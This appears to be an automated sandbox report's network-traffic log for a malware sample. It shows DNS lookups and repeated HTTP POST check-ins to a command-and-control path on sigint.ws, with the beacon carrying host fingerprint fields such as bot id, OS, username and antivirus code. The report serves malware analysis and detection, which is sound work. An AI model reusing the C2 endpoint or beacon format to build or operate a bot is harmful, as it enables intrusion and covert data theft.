                                                                              Jun 2, 2022 01:55:07.012564898 CEST4990280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:07.106450081 CEST804990280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:07.106910944 CEST4990280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:07.107382059 CEST4990280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:07.243976116 CEST804990280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:07.288651943 CEST804990280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:07.288753986 CEST4990280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:07.288897991 CEST4990280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:07.382405996 CEST804990280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:07.401428938 CEST4990380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:07.495805025 CEST804990380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:07.495939970 CEST4990380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:07.519813061 CEST4990380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:07.655129910 CEST804990380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:07.702017069 CEST804990380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:07.702231884 CEST4990380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:07.704868078 CEST4990380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:07.799105883 CEST804990380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:07.830416918 CEST4990480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:07.922379017 CEST804990480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:07.922624111 CEST4990480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:07.924426079 CEST4990480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.061053038 CEST804990480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:08.106933117 CEST804990480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:08.107326031 CEST4990480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.107683897 CEST4990480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.199357033 CEST804990480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:08.211173058 CEST4989780192.168.2.494.130.174.62
                                                                              Jun 2, 2022 01:55:08.214273930 CEST4990580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.306365013 CEST804990580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:08.306484938 CEST4990580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.307583094 CEST4990580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.439716101 CEST804990580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:08.487366915 CEST804990580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:08.487544060 CEST4990580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.489968061 CEST4990580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.581437111 CEST804990580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:08.604259968 CEST4990680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.698163986 CEST804990680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:08.698273897 CEST4990680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.703562021 CEST4990680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.839525938 CEST804990680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:08.887171030 CEST804990680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:08.887362957 CEST4990680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.887448072 CEST4990680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:08.981137037 CEST804990680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:09.002037048 CEST4990780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:09.092756033 CEST804990780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:09.092876911 CEST4990780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:09.093755960 CEST4990780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:09.227787971 CEST804990780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:09.274606943 CEST804990780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:09.274756908 CEST4990780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:09.281564951 CEST4990780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:09.372505903 CEST804990780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:09.400609970 CEST4990880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:09.493963957 CEST804990880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:09.495110989 CEST4990880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:09.504160881 CEST4990880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:09.639719963 CEST804990880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:09.686593056 CEST804990880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:09.687596083 CEST4990880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:09.688180923 CEST4990880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:09.781423092 CEST804990880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:09.800172091 CEST4990980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:09.892388105 CEST804990980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:09.893645048 CEST4990980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:09.894068956 CEST4990980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.028141022 CEST804990980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:10.075850964 CEST804990980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:10.075984001 CEST4990980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.076167107 CEST4990980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.167776108 CEST804990980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:10.186424017 CEST4991080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.280589104 CEST804991080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:10.280702114 CEST4991080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.281176090 CEST4991080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.416413069 CEST804991080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:10.464629889 CEST804991080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:10.464737892 CEST4991080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.464893103 CEST4991080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.559185982 CEST804991080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:10.574091911 CEST4991180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.670093060 CEST804991180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:10.670406103 CEST4991180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.674377918 CEST4991180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.812103987 CEST804991180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:10.860245943 CEST804991180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:10.860580921 CEST4991180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.860642910 CEST4991180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:10.956320047 CEST804991180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:10.976330042 CEST4991280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.067622900 CEST804991280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:11.067867994 CEST4991280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.068305969 CEST4991280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.199537992 CEST804991280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:11.249368906 CEST804991280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:11.249464035 CEST4991280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.249641895 CEST4991280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.341929913 CEST804991280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:11.357513905 CEST4991380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.452280045 CEST804991380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:11.452377081 CEST4991380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.452857018 CEST4991380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.588119984 CEST804991380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:11.636411905 CEST804991380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:11.636610031 CEST4991380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.638190985 CEST4991380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.732923031 CEST804991380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:11.745851040 CEST4991480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.842416048 CEST804991480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:11.842622995 CEST4991480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.848128080 CEST4991480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:11.984299898 CEST804991480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:12.031982899 CEST804991480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:12.032210112 CEST4991480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:12.032290936 CEST4991480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:12.126647949 CEST804991480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:12.136677980 CEST4991580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:12.229192019 CEST804991580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:12.229329109 CEST4991580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:12.229808092 CEST4991580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:12.364033937 CEST804991580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:12.410557032 CEST804991580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:12.410650969 CEST4991580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:12.410942078 CEST4991580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:12.503129959 CEST804991580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:12.530169010 CEST4991680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:12.620773077 CEST804991680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:12.620896101 CEST4991680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:12.621331930 CEST4991680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:12.755086899 CEST804991680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:12.802454948 CEST804991680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:12.803428888 CEST4991680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:12.803621054 CEST4991680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:12.893783092 CEST804991680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:12.918114901 CEST4991780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.009439945 CEST804991780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:13.011328936 CEST4991780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.026840925 CEST4991780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.159441948 CEST804991780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:13.206803083 CEST804991780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:13.206984043 CEST4991780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.207182884 CEST4991780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.298013926 CEST804991780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:13.323039055 CEST4991880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.414338112 CEST804991880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:13.415033102 CEST4991880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.415553093 CEST4991880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.547346115 CEST804991880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:13.595098019 CEST804991880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:13.595247984 CEST4991880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.595365047 CEST4991880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.686569929 CEST804991880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:13.710233927 CEST4991980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.806344986 CEST804991980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:13.806440115 CEST4991980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.807547092 CEST4991980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.944535017 CEST804991980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:13.991605997 CEST804991980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:13.991691113 CEST4991980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:13.991821051 CEST4991980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.087814093 CEST804991980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:14.103816986 CEST4992280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.193752050 CEST804992280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:14.193845987 CEST4992280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.194314003 CEST4992280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.211692095 CEST4989780192.168.2.494.130.174.62
                                                                              Jun 2, 2022 01:55:14.328155041 CEST804992280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:14.373663902 CEST804992280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:14.373769999 CEST4992280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.375580072 CEST4992280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.465616941 CEST804992280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:14.484147072 CEST4992580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.575834036 CEST804992580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:14.575953960 CEST4992580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.580878973 CEST4992580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.715572119 CEST804992580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:14.763034105 CEST804992580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:14.763120890 CEST4992580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.763382912 CEST4992580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.856360912 CEST804992580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:14.904699087 CEST4992780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.996170998 CEST804992780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:14.996309996 CEST4992780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:14.996722937 CEST4992780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:15.131432056 CEST804992780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:15.177180052 CEST804992780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:15.177325010 CEST4992780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:15.177401066 CEST4992780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:15.268734932 CEST804992780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:15.291512012 CEST4992880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:15.384824991 CEST804992880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:15.385648012 CEST4992880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:15.391347885 CEST4992880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:15.527483940 CEST804992880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:15.572180986 CEST804992880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:15.573621035 CEST4992880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:15.573765993 CEST4992880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:15.667145014 CEST804992880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:15.684592009 CEST4992980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:15.776418924 CEST804992980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:15.778045893 CEST4992980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:15.780137062 CEST4992980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:15.912091970 CEST804992980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:15.961910009 CEST804992980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:15.962466955 CEST4992980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:15.962966919 CEST4992980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:16.054610968 CEST804992980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:16.077490091 CEST4993080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:16.172981977 CEST804993080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:16.173130035 CEST4993080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:16.173253059 CEST4993080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:16.312175989 CEST804993080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:16.358006001 CEST804993080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:16.358187914 CEST4993080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:16.358413935 CEST4993080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:55:16.454272985 CEST804993080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:55:30.199835062 CEST4976580192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:55:30.681876898 CEST4976580192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:55:31.343579054 CEST4976580192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:55:32.682003975 CEST4976580192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:55:35.144397974 CEST4976580192.168.2.4140.82.121.3
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jun 2, 2022 01:53:21.385699034 CEST5480053192.168.2.48.8.8.8
                                                                              Jun 2, 2022 01:53:21.438299894 CEST53548008.8.8.8192.168.2.4
                                                                              Jun 2, 2022 01:53:21.562596083 CEST6445453192.168.2.48.8.8.8
                                                                              Jun 2, 2022 01:53:21.594549894 CEST53644548.8.8.8192.168.2.4
                                                                              Jun 2, 2022 01:53:40.527017117 CEST6427753192.168.2.48.8.8.8
                                                                              Jun 2, 2022 01:53:40.545897961 CEST53642778.8.8.8192.168.2.4
                                                                              Jun 2, 2022 01:53:41.007222891 CEST5607653192.168.2.48.8.8.8
                                                                              Jun 2, 2022 01:53:41.026652098 CEST53560768.8.8.8192.168.2.4
                                                                              Jun 2, 2022 01:53:42.065357924 CEST6075853192.168.2.48.8.8.8
                                                                              Jun 2, 2022 01:53:42.084232092 CEST53607588.8.8.8192.168.2.4
                                                                              Jun 2, 2022 01:53:54.731156111 CEST5406953192.168.2.48.8.8.8
                                                                              Jun 2, 2022 01:53:54.759623051 CEST53540698.8.8.8192.168.2.4
                                                                              Jun 2, 2022 01:53:54.912110090 CEST5774753192.168.2.48.8.8.8
                                                                              Jun 2, 2022 01:53:54.934061050 CEST53577478.8.8.8192.168.2.4
                                                                              Jun 2, 2022 01:55:02.223989964 CEST5759453192.168.2.48.8.8.8
                                                                              Jun 2, 2022 01:55:02.246467113 CEST53575948.8.8.8192.168.2.4
                                                                              Jun 2, 2022 01:55:26.241058111 CEST6136153192.168.2.48.8.8.8
                                                                              Jun 2, 2022 01:55:26.260370970 CEST53613618.8.8.8192.168.2.4
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Jun 2, 2022 01:53:21.385699034 CEST192.168.2.48.8.8.80x1000Standard query (0)north.acA (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:21.562596083 CEST192.168.2.48.8.8.80xce27Standard query (0)north.acA (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:40.527017117 CEST192.168.2.48.8.8.80x4d6fStandard query (0)sigint.wsA (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:41.007222891 CEST192.168.2.48.8.8.80x193cStandard query (0)github.comA (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:42.065357924 CEST192.168.2.48.8.8.80x295fStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:54.731156111 CEST192.168.2.48.8.8.80xa75cStandard query (0)north.acA (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:54.912110090 CEST192.168.2.48.8.8.80x2583Standard query (0)north.acA (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:55:02.223989964 CEST192.168.2.48.8.8.80xbc9fStandard query (0)t.meA (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:55:26.241058111 CEST192.168.2.48.8.8.80x553aStandard query (0)mastodon.onlineA (IP address)IN (0x0001)
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Jun 2, 2022 01:53:21.438299894 CEST8.8.8.8192.168.2.40x1000No error (0)north.ac172.67.152.230A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:21.438299894 CEST8.8.8.8192.168.2.40x1000No error (0)north.ac104.21.2.205A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:21.594549894 CEST8.8.8.8192.168.2.40xce27No error (0)north.ac172.67.152.230A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:21.594549894 CEST8.8.8.8192.168.2.40xce27No error (0)north.ac104.21.2.205A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:40.545897961 CEST8.8.8.8192.168.2.40x4d6fNo error (0)sigint.ws80.66.64.103A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:41.026652098 CEST8.8.8.8192.168.2.40x193cNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:42.084232092 CEST8.8.8.8192.168.2.40x295fNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:42.084232092 CEST8.8.8.8192.168.2.40x295fNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:42.084232092 CEST8.8.8.8192.168.2.40x295fNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:42.084232092 CEST8.8.8.8192.168.2.40x295fNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:54.759623051 CEST8.8.8.8192.168.2.40xa75cNo error (0)north.ac104.21.2.205A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:54.759623051 CEST8.8.8.8192.168.2.40xa75cNo error (0)north.ac172.67.152.230A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:54.934061050 CEST8.8.8.8192.168.2.40x2583No error (0)north.ac172.67.152.230A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:53:54.934061050 CEST8.8.8.8192.168.2.40x2583No error (0)north.ac104.21.2.205A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:55:02.246467113 CEST8.8.8.8192.168.2.40xbc9fNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)
                                                                              Jun 2, 2022 01:55:26.260370970 CEST8.8.8.8192.168.2.40x553aNo error (0)mastodon.online95.216.4.252A (IP address)IN (0x0001)
                                                                              • north.ac
                                                                              • github.com
                                                                              • raw.githubusercontent.com
                                                                              • t.me
                                                                              • sigint.ws
                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.449759172.67.152.230443C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.2.449766140.82.121.3443C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              10192.168.2.44978480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:53:58.905730963 CEST3406OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:53:59.087666035 CEST3406INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:53:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              100192.168.2.44987480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:56.482566118 CEST3490OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:56.665231943 CEST3490INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              101192.168.2.44987580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:56.892898083 CEST3491OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
